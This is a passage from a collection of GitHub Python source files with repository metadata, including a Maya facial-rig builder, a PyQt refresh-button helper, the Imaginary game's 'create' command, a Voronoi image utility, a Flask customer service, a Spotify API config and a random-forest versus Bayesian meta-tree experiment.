\"iss\"))\n","repo_name":"kasem777/Python-codeacademy","sub_path":"Loops/count_multi_X.py","file_name":"count_multi_X.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70121743085","text":"\njohn_salary = 1.500\nmarta_salary = 2.500\njohn_age = 24\nmarta_age = 35\njohn_name = \"John\"\nmarta_name = \"Marta\"\njohn_gender = False\nmarta_gender = True\njohn_friends = [\"Bill\", \"Anna\", \"Alex\", \"Bill\"]\nmarta_friends = [\"Max\",\"Peter\",\"Yana\", \"Mike\"] \ntest_list_of_names = [\"Max\",\"Peter\",\"Yana\", \"Mike\", \"Bill\", \"Anna\", \"Alex\", \"Bill\"]\n\n\nprint (f'Name of user 1 - {marta_name}, \\nage = {marta_age},\\nsalary = {marta_salary:.3f},\\ngender = {marta_gender},\\nlist of friends {marta_friends}\\n')\nprint (f'Name of user 2 - {john_name}, \\nage ={john_age}, \\nsalary = {john_salary:.3f}, \\ngender = {john_gender}, \\nlist of friends {john_friends}\\n')\nprint (f'List of users without duplicates {set(test_list_of_names)}')","repo_name":"ProtsenkoM/Home_works","sub_path":"homework_task_1/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9645848183","text":"import maya.cmds as cmds\nfrom ..base import control\nfrom ..base import module\nfrom ..rigLib import lib\n\nreload(control)\nreload(module)\nreload(lib)\n\n\ndef createRig(vertexList,\n prefix='L_',\n rigPartName='',\n rigScale=1.0,\n addSliderCtrls=True,\n jointParent=''):\n\n 
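# start from an empty selection so the new module and joints are not parented under whatever is currently selected\n 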
cmds.select(cl=1)\n\n # create module\n rigModule = module.Module(prefix=prefix,\n rigPartName=rigPartName)\n\n # create joint on each vertex\n jointList = lib.vertex2Joints(vertexList=vertexList,\n prefix=prefix,\n rigPartName=rigPartName,\n addSlaveAttr=True)\n\n # parent created joint to target joint\n if jointParent:\n for i in jointList:\n cmds.select(cl=1)\n cmds.parent(i, jointParent)\n cmds.select(cl=1)\n\n # add control for each joint\n jointCtrlList = []\n jointCtrlGrpList = []\n # create controls\n for i in xrange(len(jointList)):\n jointCtrl = control.Control(prefix=jointList[i],\n rigPartName='',\n scale=rigScale * 0.2,\n translateTo=jointList[i],\n rotateTo=jointList[i],\n shape='circleY')\n\n cmds.pointConstraint(jointCtrl.C, jointList[i], mo=0)\n cmds.orientConstraint(jointCtrl.C, jointList[i], mo=0)\n\n jointCtrlList.append(jointCtrl.C)\n jointCtrlGrpList.append(jointCtrl.Off)\n\n # connect the attribute\n for i in jointList:\n cmds.connectAttr(rigModule.topGrp + '.' + prefix + rigPartName + '_Jnt',\n i + '.' + prefix + rigPartName, f=1)\n\n # slider controls\n slideCtrlList = []\n slideCtrlGrpList = []\n\n if addSliderCtrls:\n for i in xrange(len(jointList)):\n slideCtrl = control.Control(prefix=prefix,\n rigPartName=rigPartName + '_Jnt_' + str(i) + '_SLD',\n scale=rigScale * 0.5,\n shape='planeSliderControl',\n lockChannels=['ty', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v'])\n\n slideCtrlList.append(slideCtrl.C)\n slideCtrlGrpList.append(slideCtrl.Off)\n\n # cleanHierarchy\n for i in jointCtrlGrpList:\n cmds.parent(i, rigModule.topGrp)\n\n if addSliderCtrls:\n rigModuleSliderGrp = cmds.group(n=prefix + rigPartName + '_SLD_Grp', em=1)\n for i in slideCtrlGrpList:\n cmds.parent(i, rigModuleSliderGrp)\n\n cmds.parent(rigModuleSliderGrp, rigModule.topGrp)\n\n # set default keyframe\n cmds.setDrivenKeyframe()\n\n","repo_name":"tHeBeStXu/FacialRigTool","sub_path":"FacialRigTool/rig/vertex2Rig.py","file_name":"vertex2Rig.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"19"} +{"seq_id":"42671306265","text":"import types\n\nfrom PyQt5 import QtCore\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5.QtWidgets import QWidget, QPushButton\n\nfrom need.setting import settings\n\nbutton_stat = {\n 'refresh': {\n 'enable' : True,\n 'visible': True\n }\n}\n\n\nclass ViewAddFunctionButton:\n \"\"\"\n 识图添加功能按键\n \"\"\"\n \n refresh_style = \"\"\"QPushButton{\n\n font: bold 14px;\n color: rgb(0, 85, 255);\n border: 1px solid rgb(0, 0, 0);\n border-radius: 12px;\n background-color: rgb(230, 230, 230);\n }\n\n QPushButton:hover{\n font: bold 16px;\n color: rgb(0, 40, 255);\n background-color: rgb(217, 217, 217);\n padding-bottom: 2px;\n }\n\n QPushButton:pressed{\n\n color: rgb(0, 0, 255);\n background-color: rgb(189, 189, 189);\n padding-top: 2px;\n }\n\n QPushButton:disabled{\n\n color: rgb(173, 173, 173);\n background-color: rgb(234, 234, 234);\n }\"\"\"\n \n refresh_style1 = \"\"\"\n QPushButton{\n border: 1px solid rgb(0, 0, 0);\n border-radius: 12px;\n }\n\n QPushButton:hover{\n background-color: rgb(171, 171, 171);\n }\n\n QPushButton:pressed{\n background-color: rgb(121, 121, 121);\n padding-top:2px;\n }\"\"\"\n \n def __init__(self, view: QWidget):\n super().__init__()\n self.view = view\n self._button_flag = None\n \n def add_refresh_button(self):\n if not self.view or not isinstance(self.view, QWidget):\n return\n pb_refresh = self._new_a_refresh_button(self.view)\n setattr(self.view, '_pb_refresh', 
pb_refresh)\n \n self.view.enterEvent = types.MethodType(self.enterEvent, self.view)\n self.view.leaveEvent = types.MethodType(self.leaveEvent, self.view)\n \n refresh = getattr(self.view, 'refresh', None) # lambda x=self.view:print(f'{self.view}不存在刷新函数')\n \n if not refresh:\n print(f'{self.view}不存在刷新函数')\n return self.pb_refresh.setEnabled(False)\n pb_refresh.clicked.connect(refresh)\n pb_refresh.clicked.connect(lambda: pb_refresh.setEnabled(False))\n pb_refresh.clicked.connect(lambda: QTimer.singleShot(2000, lambda: pb_refresh.setEnabled(True)))\n \n def open_button(self):\n self._button_flag = True\n self.pb_refresh.setEnabled(True)\n \n def close_button(self):\n self._button_flag = False\n self.pb_refresh.setEnabled(False)\n \n def _new_a_refresh_button(self, pa):\n self.pb_refresh = QPushButton('↻', pa)\n self.pb_refresh.resize(24, 24)\n self.pb_refresh.setStyleSheet(self.refresh_style)\n self.pb_refresh.setToolTip('刷新当前\\n界面信息')\n \n self.pb_refresh.setVisible(False)\n \n return self.pb_refresh\n \n @staticmethod\n def enterEvent(self, a0: QtCore.QEvent) -> None:\n pb_refresh: QPushButton = getattr(self, '_pb_refresh', None)\n \n visible = button_stat.get('refresh', {}).get('visible', True)\n enable = button_stat.get('refresh', {}).get('enable', True)\n \n if not pb_refresh or not visible:\n return\n pb_refresh.setEnabled(enable)\n pb_refresh.setGeometry(\n self.width() - pb_refresh.width(),\n 0,\n pb_refresh.width(),\n pb_refresh.height()\n )\n pb_refresh.setVisible(True)\n super(self.__class__, self).enterEvent(a0)\n \n @staticmethod\n def leaveEvent(self, a0: QtCore.QEvent) -> None:\n pb_refresh = getattr(self, '_pb_refresh', None)\n if not pb_refresh:\n return\n pb_refresh.setVisible(False)\n super(self.__class__, self).leaveEvent(a0)\n\n\ndef load_setting():\n setting = settings.setdefault('setting', {}).setdefault('ViewAddFunctionButton', {})\n button_stat.update(setting)\n","repo_name":"sdyzw/PyQtControlModule","sub_path":"Common/ViewAddFunOperate/view_add_fun_button.py","file_name":"view_add_fun_button.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28628153122","text":"# -*- test-case-name: imaginary.test.test_create -*-\n\"\"\"\nThis module contains code associated with creating objects in game.\n\"\"\"\n\nfrom zope.interface import implements\n\nfrom twisted import plugin\n\nimport imaginary.plugins\n\nfrom imaginary import objects\nfrom imaginary import events\nfrom imaginary import language\n\nfrom imaginary.iimaginary import IThingType\nfrom imaginary.eimaginary import ActionFailure, DoesntFit\n\nfrom imaginary.action import Action, insufficientSpace\nfrom imaginary.action import targetString\n\nfrom imaginary.pyparsing import Literal, White, Optional, restOfLine\n\n\ndef getPlugins(iface, package):\n \"\"\"\n Get plugins. See L{twisted.plugin.getPlugins}.\n\n This is in place only so the tests specifically for creation can replace\n it. Please use L{twisted.plugin.getPlugins} instead.\n \"\"\"\n # XXX the tests should not need to do that, make it per-instance or\n # something...\n return plugin.getPlugins(iface, package)\n\n\ndef createCreator(*enhancements):\n \"\"\"\n Create and return a function which can create objects in the game world.\n\n This is a utility function to make it easy to define factories for certain\n configurations of power-ups to be used with Imaginary. 
It doesn't do\n anything magical; you can replicate its effects simply by writing a\n function that calls L{Enhancement.createFor} on the set of L{Enhancement}s.\n L{createCreator} exists because you will frequently need to do that, and it\n can be tedious.\n\n @param enhancements: The arguments to this function are a list of 2-tuples\n of (L{Enhancement}-subclass, keyword arguments to that class's\n constructor).\n\n @return: a function which takes keyword arguments that will be passed on to\n L{objects.Thing}'s constructor, and will return a L{Thing} with an\n instance of each class in C{enhancements} installed, via C{createFor},\n on it.\n\n @rtype: L{Thing}\n \"\"\"\n def create(**kw):\n o = objects.Thing(**kw)\n for enhancementClass, enhancementKeywords in enhancements:\n enhancementClass.createFor(o, **(enhancementKeywords or {}))\n return o\n return create\n\n\nclass CreationPluginHelper(object):\n \"\"\"\n A helper for creating plugins for the 'Create' command.\n\n Create will search for L{IThingType} plugins and allow users to\n instantiate a new L{objects.Thing} using the one with the name which\n matches what was supplied to the action.\n \"\"\"\n\n implements(plugin.IPlugin, IThingType)\n\n def __init__(self, typeName, typeObject):\n \"\"\"\n @type typeName: C{unicode}\n @param typeName: A short string describing the kind of object this\n plugin will create.\n\n @param typeObject: A factory for creating instances of\n L{objects.Thing}. This will be invoked with four keyword arguments:\n store, name, description, and proper. See attributes of\n L{objects.Thing} for documentation of these arguments.\n \"\"\"\n self.type = typeName\n self.typeObject = typeObject\n\n\n def getType(self):\n return self.typeObject\n\n\n\ndef creationSuccess(player, creation):\n \"\"\"\n Create and return an event describing that an object was successfully\n created.\n \"\"\"\n phrase = language.Noun(creation).nounPhrase()\n return events.Success(\n actor=player,\n target=creation,\n actorMessage=language.Sentence([\"You create \", phrase, \".\"]),\n targetMessage=language.Sentence([player, \" creates you.\"]),\n otherMessage=language.Sentence([player, \" creates \", phrase, \".\"]))\n\n\nclass Create(Action):\n \"\"\"\n An action which can create items by looking at the L{IThingType} plugin\n registry.\n \"\"\"\n expr = (Literal(\"create\") +\n Optional(White() +\n (Literal(\"an\") | Literal(\"a\") | Literal(\"the\")).setResultsName(\"article\")) +\n White() +\n targetString(\"typeName\") +\n White() +\n Literal(\"named\") +\n White() +\n targetString(\"name\") +\n Optional(White() +\n restOfLine.setResultsName(\"description\")))\n\n def do(self, player, line, typeName, name, description=None, article=None):\n \"\"\"\n Create an item, and notify everyone present that it now exists.\n \"\"\"\n if not description:\n description = u'an undescribed object'\n for plug in getPlugins(IThingType, imaginary.plugins):\n if plug.type == typeName:\n proper = (article == \"the\")\n o = plug.getType()(store=player.store, name=name,\n description=description, proper=proper)\n break\n else:\n raise ActionFailure(\n events.ThatDoesntMakeSense(\n actor=player.thing,\n actorMessage=language.ExpressString(\n u\"Can't find \" + typeName + u\".\")))\n\n creationSuccess(player.thing, o).broadcast()\n try:\n o.moveTo(player.thing)\n except DoesntFit:\n raise insufficientSpace(player.thing)\n\n\n\n\ndef listThingTypes():\n \"\"\"\n Return a list of C{unicode} strings each of which gives the name of a type\n which can be 
created with the create command.\n \"\"\"\n return sorted([type.type for type in getPlugins(IThingType, imaginary.plugins)])\n\n\n\nclass ListThingTypes(Action):\n \"\"\"\n An action which tells the invoker what thing types exist to be created with\n the L{Create} command.\n \"\"\"\n expr = Literal(\"list thing types\")\n\n def do(self, player, line):\n \"\"\"\n Tell the player the thing types which exist.\n \"\"\"\n events.Success(\n actor=player.thing,\n actorMessage=[(t, \"\\n\") for t in listThingTypes()]).broadcast()\n","repo_name":"twisted/imaginary","sub_path":"src/imaginary/creation.py","file_name":"creation.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"19"} +{"seq_id":"788205423","text":"import random\nfrom typing import Tuple, List\nimport numpy as np\nfrom scipy.spatial import Voronoi, voronoi_plot_2d\nfrom PIL import ImageDraw, Image\n\n\ndef random_color() -> Tuple[int, ...]:\n \"\"\"Return a random color\n\n Args:\n None\n\n Returns:\n Tuple[int,...]: A random RGB colour.\n \"\"\"\n red = random.randrange(0, 255)\n blue = random.randrange(0, 255)\n green = random.randrange(0, 255)\n return (red, blue, green)\n\n\ndef scale_points(points: np.ndarray, width: int, height: int) -> List[List[int]]:\n \"\"\"Scale the points to the size of the image\n\n Args:\n points (np.ndarray): Points to be scaled.\n width (int): The width of the image.\n height (int): The height of the image.\n\n Returns:\n List[List[int]]: The list of scaled points.\n \"\"\"\n scaled_points = []\n for x, y in points:\n x = x * width\n y = y * height\n scaled_points.append([x, y])\n return scaled_points\n\n\ndef generate_voronoi_diagram(\n num_cells, width, height\n) -> Tuple[Voronoi, List[List[int]]]:\n \"\"\"Generate voronoi diagram as polygons\n\n Args:\n num_cells (int): The number of points used for\n the Voronoi diagram.\n width (int): The width of the image.\n height (int): The height of the image.\n\n Return:\n Tuple[Voronoi, List[List[int]]]: The Voronoi diagram\n \"\"\"\n # Make up data points\n points = np.random.rand(num_cells - 4, 2)\n default = np.array(\n [\n np.array([0.0, 0.0]),\n np.array([1.0, 0.0]),\n np.array([0.0, 1.0]),\n np.array([1.0, 1.0]),\n ]\n )\n points = np.concatenate((points, default), axis=0)\n # Scale them\n points = scale_points(points, width, height)\n # Compute Voronoi tesselation\n vor = Voronoi(points)\n # Plot\n voronoi_plot_2d(vor)\n return vor, points\n\n\ndef get_color_of_point(point: Tuple, rgb_im: Image, width: int, height: int) -> Tuple:\n \"\"\"Get the color of specific point.\n\n Args:\n point (Tuple): The point in the image from which\n we want to extract the colour.\n rgb_im (Image): The image from which we want to get\n the colour.\n width (int): The width of the image.\n height (int): The height of the image.\n\n Returns:\n Tuple: The value of the colour.\n \"\"\"\n x = int(point[0])\n y = int(point[1])\n new_point = (x, y)\n try:\n return rgb_im.getpixel(new_point)\n except:\n new_point = list(new_point)\n if new_point[0] == width:\n new_point[0] -= 1\n if new_point[1] == height:\n new_point[1] -= 1\n new_point = tuple(new_point)\n return rgb_im.getpixel(new_point)\n\n\ndef makeup_polygons(\n draw: ImageDraw,\n num_cells: int,\n width: int,\n height: int,\n rgb_im: Image,\n random: bool,\n):\n \"\"\"Makeup and draw polygons for a Voronoi diagram\n\n Args:\n draw (ImageDraw): `ImageDraw` object to draw new\n Voronoi diagram.\n num_cells (int): Number of random points 
that will\n be used for the Voronoi diagram.\n width (int): Width of the image.\n height (int): Height of the image.\n rgb_im (Image): Original image, in RBG format.\n random (bool): Whether to use random colours or not.\n\n Returns:\n None\n \"\"\"\n voronoi, points = generate_voronoi_diagram(num_cells, width, height)\n for point, index in zip(points, voronoi.point_region):\n # Getting the region of the given point\n region = voronoi.regions[index]\n # Getting the points in arrays\n polygon = list()\n for i in region:\n # If vector is out of plot do not add\n if i != -1:\n polygon.append(voronoi.vertices[i])\n # Make tuples of the points\n polygon_tuples = list()\n for l in polygon:\n polygon_tuples.append(tuple(l))\n rgb = (0, 0, 0)\n if random:\n # Get random color\n rgb = random_color()\n else:\n # Get colors of the middle point\n rgb = get_color_of_point(point, rgb_im, width, height)\n # Draw the calculated polygon with the color of the middle point\n if polygon and polygon_tuples:\n draw.polygon(polygon_tuples, rgb)\n","repo_name":"alfredolozano/cosa","sub_path":"cosa/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"2453845185","text":"from app.main import db\nfrom app.main.model.customer import Customer\n\n\ndef add_new_customer(input_data):\n customer = Customer.query.filter_by(phone_number=input_data['phone_number']).first()\n\n if not customer:\n new_customer = Customer(\n email=input_data['email'],\n name=input_data['name'],\n phone_number=input_data['phone_number']\n )\n # new_customer = Customer(input_data**) same as the previous line if the object's attributes labels are equal to the schema's fields labels\n commit_changes(new_customer)\n response_object = {\n 'status': 'success',\n 'message': 'New customer successfully registered.'\n }\n return response_object, 201\n else:\n response_object = {\n 'status': 'fail',\n 'message': 'Customer with phone number {} already exists.'.format(input_data['phone_number']),\n }\n return response_object, 409\n\n\ndef commit_changes(data):\n db.session.add(data)\n db.session.commit()\n\n\ndef get_all_customers():\n return Customer.query.all()\n\n\ndef get_customer_by_phone_number(phone_number):\n return Customer.query.filter_by(phone_number=phone_number).first()\n","repo_name":"ibrahimba9/book-store-flask-api","sub_path":"bookstore/app/main/service/customer_service.py","file_name":"customer_service.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34819242090","text":"import urllib.parse\n\n\n\"\"\" Add the client id and client secret information from your spotify dev\"\"\"\nCLIENT_ID = \"\"\nCLIENT_SECRET = \"\"\nREDIRECT_URI = 'http://example.com/callback/'\n\nSPOTIFY_API_BASE_URL = 'https://api.spotify.com'\nSPOTIFY_API_ACCOUNT_URL = 'http://accounts.spotify.com/authorize'\n\nSPOTIFY_TOKEN_URL = 'https://accounts.spotify.com/api/token'\nSPOTIFY_API_URL = \"{}/{}\".format(SPOTIFY_API_BASE_URL, 'v1')\nSPOTIFY_PLAYLIST_URL = \"{}/v1/me/tracks\".format(SPOTIFY_API_BASE_URL)\n\nSCOPE = \" \".join(['playlist-read-collaborative','playlist-read-private', 'user-library-read'])\n\nclient_info = {'client_id': CLIENT_ID,\n 'response_type': 'code',\n 'scope': SCOPE,\n 'redirect_uri':REDIRECT_URI,\n 'state':'34fFs29kd09'\n }\n\nCLIENT_INFO_ENCODED = urllib.parse.urlencode(client_info)\n\n\nSPOTIFY_AUTHREQUEST_URL = 
\"{}?{}\".format(SPOTIFY_API_ACCOUNT_URL,CLIENT_INFO_ENCODED)\n\n","repo_name":"antongregory/YoutubeSpotify","sub_path":"app_key/SpotifyInfo.py","file_name":"SpotifyInfo.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39489001390","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 22 12:16:05 2019\n\n@author: nao\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport random\nimport math\nimport copy\nfrom scipy.stats import entropy\n\n######################constant values######################################################\nCONDITION = 3\nD_MAX_ARR = np.array([2,4,6])#MaxDepth of MetaTree\nB_ARR = np.array([10,10,10])\nD_MAX_TRUE = 4#MaxDepth of true model\nK = 500\nN = 1000\nTHETA = 5000\nM = 1#the number of generating true model\nTEST = 100\nBRANCH_NUM = 2\nY_VALUE = 2\nBETA = np.ones(Y_VALUE) / Y_VALUE\nN_WIDTH = 100\nDATA_DIVISION_RATE = 0.05\nRF_FEAT_NUM = math.ceil(math.sqrt(K))\n######################tree structure######################################################\nclass Node:\n def __init__(self, depth):\n self.childs = [None for i in range(BRANCH_NUM)]\n self.depth = depth\n self.feat = -1\n self.division_index_list = []\n self.g = 1/2#division probability on each branch\n self.n = np.zeros(Y_VALUE) \n self.P = 1 / 2#probability of y=0\n self.q = 1 / 2\n self.theta = np.ones(Y_VALUE) / Y_VALUE\n self.division = 0 #0:division 1:no division\n self.y_num = [0 for i in range(Y_VALUE)]\n self.pred_y = -1\n\n ######################generate true tree######################################################\n def make_true_tree(self, depth, flist):\n if depth < D_MAX_TRUE:\n self.feat = np.random.choice(flist, 1)[0]#select at random from flist\n flist_copied = flist.copy()\n flist_copied.remove(self.feat)\n self.division = np.random.binomial(1, self.g, 1)#decide whether division occurs according with self.g\n else:\n self.g = 1 \n self.division = 1\n if self.division != 1:\n for branch in range(BRANCH_NUM):\n self.childs[branch] = Node(depth)\n self.childs[branch].make_true_tree(depth+1, flist_copied)\n \n def make_theta(self, depth):\n if self.division == 1:#分割しない \n self.theta = np.random.dirichlet(BETA,1)[0]\n else:\n for branch in range(BRANCH_NUM):\n self.childs[branch].make_theta(depth+1)\n ######################entropy, division index################################################\n def entropy( y ):\n y_num = np.zeros(Y_VALUE)\n y_rate = np.zeros(Y_VALUE)\n size = len(y)\n ent = 0\n for y_value in range(Y_VALUE): \n for j in range(size):\n if y[j] == y_value:\n y_num[y_value] += 1\n \n for y_value in range(Y_VALUE):\n if y_num[y_value] != 0 and y_num[y_value] != size:#0log0,1log1=0\n y_rate[y_value] = y_num[y_value] / size \n ent += -y_rate[y_value] * np.log2(y_rate[y_value])\n print(y_rate)\n return ent\n\n def division_index_cal(self, data, flist):#data is the tuple of xy\n self.division_index_list = [0 for i in range(len(flist))]\n for i in range(len(flist)):\n for branch in range(BRANCH_NUM):\n data_selected = np.delete(data.copy(), np.where(data[flist[i]][:] != branch), axis=1)#delete the row except for x_i=branch\n if data_selected.shape[1] == 0:#if no data\n self.division_index_list[i] += np.log2(data.shape[1])\n else:\n self.division_index_list[i] += data_selected.shape[1] * entropy([np.count_nonzero(data_selected[-1][:] == y_value) /data.shape[1] for y_value in range(Y_VALUE)], base=2) / data.shape[1]\n 
self.feat = flist[np.argmin(self.division_index_list)]\n \n ######################generate true tree for classification##########\n def make_RF(self,depth, flist, condition, data, n):#select feature values at random\n if np.shape(data)[1] != 0:\n for y_value in range(Y_VALUE):\n self.y_num[y_value] += np.count_nonzero(data[-1,:] == y_value)\n if len(data[0,:]) < n * DATA_DIVISION_RATE:\n self.division = 1\n else: \n if depth < D_MAX_ARR[condition]:\n self.division_index_cal(data, flist)\n flist_copied = flist.copy()\n flist_copied.remove(self.feat)\n else:\n self.division = 1\n if self.division == 0:\n for branch in range(BRANCH_NUM): \n self.childs[branch] = Node(depth+1)\n self.childs[branch].make_RF(depth+1, flist_copied, condition, np.delete(data, np.where(data[self.feat] != branch)[0], axis=1), n)\n else:\n self.division = 1\n if self.division == 1:\n self.pred_y = np.argmax(self.y_num)\n\n def make_tree_shape_only(self, condition):#select feature values at random\n if self.depth < D_MAX_ARR[condition]:\n for branch in range(BRANCH_NUM):\n self.childs[branch] = Node(self.depth+1)\n self.childs[branch].make_tree_shape_only(condition)\n\n\n ######################with renewal of poseterior distribution###############################################\n def q_cal(self, y_value):\n return (self.n[y_value] + BETA[y_value]) / (self.n.sum() + np.sum(BETA)) \n\n def n_add(self, data):\n self.n[data[-1]] += 1\n \n def g_cal(self,data, condition):\n if self.division == 0:\n self.g *= self.childs[data[self.feat]].P / self.P\n\n def P_cal_with_update(self, data, condition):\n if self.division == 1:\n self.P = self.q_cal(data[-1])\n else:\n self.P = (1 - self.g) * self.q_cal(data[-1]) + self.g * self.childs[data[self.feat]].P_cal_with_update(data, condition)\n self.g_cal(data, condition)\n self.n_add(data) \n return self.P\n\n ######################only classification######################################################\n def P_cal(self,data_x, condition, y_value):\n if self.division == 1:\n tmp_P = self.q_cal(y_value)\n else:\n tmp_P = (1 - self.g) * self.q_cal(y_value) + self.g * self.childs[data_x[self.feat]].P_cal(data_x, condition, y_value)\n return tmp_P\n ###################insert data and classification###############################################################\n def classify(self, new_data):\n if self.division == 1:\n y = self.pred_y\n else:\n y = self.childs[new_data[self.feat]].classify(new_data)\n return y\n\n ##############copy parameters on the tree############################################\n def feature_trees_copy_RF(self, node, condition, flist):\n if node is None:\n self.division = 1\n elif node.division == 1:\n self.division = 1\n else:\n self.feat = node.feat\n flist_copied = flist.copy()\n flist_copied.remove(self.feat)\n if self.depth < D_MAX_ARR[condition]:\n for branch in range(BRANCH_NUM):\n self.childs[branch].feature_trees_copy_RF(node.childs[branch], condition, flist_copied)\n\n######################generate data######################################################\ndef y_decide(node, data):\n if node.division== 1:\n theta = node.theta\n elif node.division != 1:\n theta = y_decide(node.childs[data[node.feat]], data)\n return theta\n\n\n######################Random Forest######################################################\nclass RF_trees:\n def __init__(self, condition, train_data, n):\n self.root_list = [None for i in range(B_ARR[condition])]\n for i in range(B_ARR[condition]):\n boot_num = np.random.randint(0, n, (n))\n bootstrap_sample = np.zeros((K+1,n), 
dtype='int')\n for bootstrap_sample_num in range(n):\n bootstrap_sample[:,bootstrap_sample_num] = train_data[:,boot_num[bootstrap_sample_num]]\n RF_flist = random.sample([i for i in range(K)], RF_FEAT_NUM)\n self.root_list[i] = Node(0)\n self.root_list[i].make_RF(0, RF_flist, condition, bootstrap_sample, n)\n\n######################Feature Trees######################################################\nclass Feature_trees:\n def __init__(self, condition, train_data):\n self.root_list = [None for i in range(B_ARR[condition])]\n for i in range(B_ARR[condition]):\n self.root_list[i] = Node(0)\n self.root_list[i].make_tree_shape_only(condition)\n self.posterior = np.ones(B_ARR[condition]) / B_ARR[condition]\n\n ######################renew poseterior disribution######################################################\n def posterior_cal(self,data, condition):\n for i in range(B_ARR[condition]):\n self.root_list[i].P_cal_with_update(data, condition)\n self.posterior[i] *= self.root_list[i].P\n self.posterior /= self.posterior.sum()\n \n ######################classification######################################################\n def prediction(self,data, condition):\n tmp = np.zeros(Y_VALUE)\n for y_value in range(Y_VALUE):\n for i in range(B_ARR[condition]):\n tmp[y_value] += self.posterior[i] * self.root_list[i].P_cal(data, condition, y_value)\n\n return np.argmax(tmp)\n\n\n\n######################main######################################################\ncorrect_RF = np.zeros((CONDITION, int(N/N_WIDTH)), dtype = 'int')\nincorrect_RF = np.zeros((CONDITION, int(N/N_WIDTH)), dtype = 'int')\ncorrect = np.zeros((CONDITION, int(N/N_WIDTH)), dtype = 'int')\nincorrect = np.zeros((CONDITION, int(N/N_WIDTH)), dtype = 'int')\nrf_trees = [[None for i in range(int(N/N_WIDTH))] for i in range(CONDITION)]\n\nfor m in range(M):\n print('m= %s' % m)\n #generate true tree\n true_root = Node(0)\n true_root.make_true_tree(0, [i for i in range(K)])\n for theta in range(THETA):\n true_root.make_theta(0) \n #generate data\n train_data = np.array([[random.randint(0, BRANCH_NUM - 1) for j in range(N)] for i in range(K+1)],dtype = 'int')\n test_data = np.array([[random.randint(0, BRANCH_NUM - 1) for j in range(TEST)] for i in range(K+1)],dtype = 'int')\n for j in range(N):\n train_data[-1,j] = np.where(np.random.multinomial(1, y_decide(true_root, train_data[:,j])) == 1)[0][0]\n for j in range(TEST):\n test_data[-1,j] = np.where(np.random.multinomial(1, y_decide(true_root, test_data[:,j])) == 1)[0][0]\n\n feature_trees = Feature_trees(-1, train_data) #condition=-1\n #generate tree for Random Forest\n for condition in range(CONDITION):\n for n in range(N_WIDTH, N + 1, N_WIDTH):#10,20,30,...\n train_data_sub = train_data[:,0:n+1].copy()\n rf_trees[condition][int(n/N_WIDTH)-1] = RF_trees(condition, train_data_sub, n) \n for j in range(TEST):\n y_pred_arr = np.zeros(Y_VALUE, dtype = 'int')\n for b_arr in range(B_ARR[condition]):\n y_pred_arr[rf_trees[condition][int(n/N_WIDTH)-1].root_list[b_arr].classify(test_data[:,j])] += 1\n if np.argmax(y_pred_arr) == test_data[-1,j]:\n correct_RF[condition][int(n/N_WIDTH)-1] += 1\n else:\n incorrect_RF[condition][int(n/N_WIDTH)-1] += 1\n\n #generate tree for classification\n feature_trees_deepcopy = copy.deepcopy(feature_trees)\n for b_arr in range(B_ARR[condition]):\n feature_trees_deepcopy.root_list[b_arr].feature_trees_copy_RF(rf_trees[condition][int(n/N_WIDTH)-1].root_list[b_arr], condition, [i for i in range(K)])\n #renew posterior distribution\n for j in range(0, n):\n 
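# Sequential Bayesian update: posterior_cal multiplies each meta-tree's\n                # weight by the predictive probability it assigned to this sample's\n                # label, then renormalizes the weights over the ensemble.\n                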
feature_trees_deepcopy.posterior_cal(train_data[:,j], condition)\n\n #classification\n for j in range(TEST):\n if feature_trees_deepcopy.prediction(test_data[:,j], condition) == test_data[-1,j]:\n correct[condition][int(n/N_WIDTH)-1] += 1\n else:\n incorrect[condition][int(n/N_WIDTH)-1] += 1\n\nnum = np.zeros(int(N/N_WIDTH), dtype = 'int')\nerror_rate_RF = np.zeros((CONDITION, int(N/N_WIDTH)), dtype = 'float')\nfor n in range(N_WIDTH, N + 1, N_WIDTH):\n num[int((n-1)/N_WIDTH)] = n\nfor condition in range(CONDITION):\n for n in range(N_WIDTH, N + 1, N_WIDTH):\n error_rate_RF[condition][int((n-1)/N_WIDTH)] = incorrect_RF[condition][int((n-1)/N_WIDTH)] / (THETA * TEST * M)\n error_rate_list_RF = error_rate_RF[condition].tolist()\n fig, ax = plt.subplots()\n ax.get_xaxis().get_major_formatter().set_useOffset(False)\n ax.get_xaxis().set_major_locator(ticker.MaxNLocator(integer=True))\n plt.plot(num,error_rate_list_RF)\n print(error_rate_list_RF)\n\n\n\nerror_rate = np.zeros((CONDITION, int(N/N_WIDTH)), dtype = 'float')\nfor condition in range(CONDITION):\n for n in range(N_WIDTH, N + 1, N_WIDTH):\n error_rate[condition][int((n-1)/N_WIDTH)] = incorrect[condition][int((n-1)/N_WIDTH)] / (THETA * TEST * M)\n error_rate_list = error_rate[condition].tolist()\n fig, ax = plt.subplots()\n ax.get_xaxis().get_major_formatter().set_useOffset(False)\n ax.get_xaxis().set_major_locator(ticker.MaxNLocator(integer=True))\n plt.plot(num,error_rate_list)\n print(error_rate_list)\n","repo_name":"nao29/ACML-2020","sub_path":"Expermients/Experiment1.py","file_name":"Experiment1.py","file_ext":"py","file_size_in_byte":13660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} 